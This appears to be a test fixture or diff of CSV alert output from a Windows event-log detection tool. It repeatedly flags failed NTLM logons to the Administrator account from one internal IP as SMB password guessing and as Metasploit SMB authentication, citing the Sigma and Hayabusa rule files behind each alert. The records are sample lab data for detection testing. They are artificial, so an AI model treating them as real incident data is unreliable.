+2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1JERyz3mOBZt2jki  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V0i93RW5AOsIKKMU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U3XEu06vE68O900O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0fxeGE2jXOnoJttj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Wdg3l6IFHTdh09j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4XLVQRnkUd3bfgvF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rHjqFQwqpCJFI6qP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L5pEWq2mYsFpFLbb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HSFKJXTC2wlyw0gu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vh5igCJpAA5rmqzV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5NzLlJWkfXDcm64c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i9sR1QHgZ4oaa82F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pq1GWcKzSHSP28hk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: agCtM0s62zXPop0y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dVvglj7RtxrBUeXi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pMbS0sIpbFDqJvMW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ldO0cAZ54BRHHDyz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OmJH2QWFPiYarKh5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5fCiyHtI0OTo8pBO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e3vkVuU43tsYHUSj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3w21sFOu2u7FTDZM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bk7eaqQNK1CEgqoj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Rv5joLgkm3QUYPyb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4l15usDM7jggwEyw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p9QpOvgDmiOgzQqb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dqyr8tb9TrO1aJNe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hI1bzjixP8eOdDbw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pMTAp20wXS3d1OCk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qrQGfxInmlgPqGtd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZcsMMQbsnUdyLJWi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8oRYZqBBsq9GyApI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0TAhib6p8fY5iOgI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FerGHj9abOe6ehZn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kN4B4KLpXbyKZzGv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HJtoyRfP38T3KToO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rkI5hLApUWhGnKIs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZCPSO4JLjMur2Eow  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VHmrv2xFuq7TyIQN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8SqYq3msNfFh24lg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YE0a2Bypzc1MMdGn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ojgIg88VK6hB72PI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ehLrf2GoAhY3Rf7Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ccfgpjwpis15B4gY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vysSf3DsOxQf5fVd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IEp88cEeiNw4IQsm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
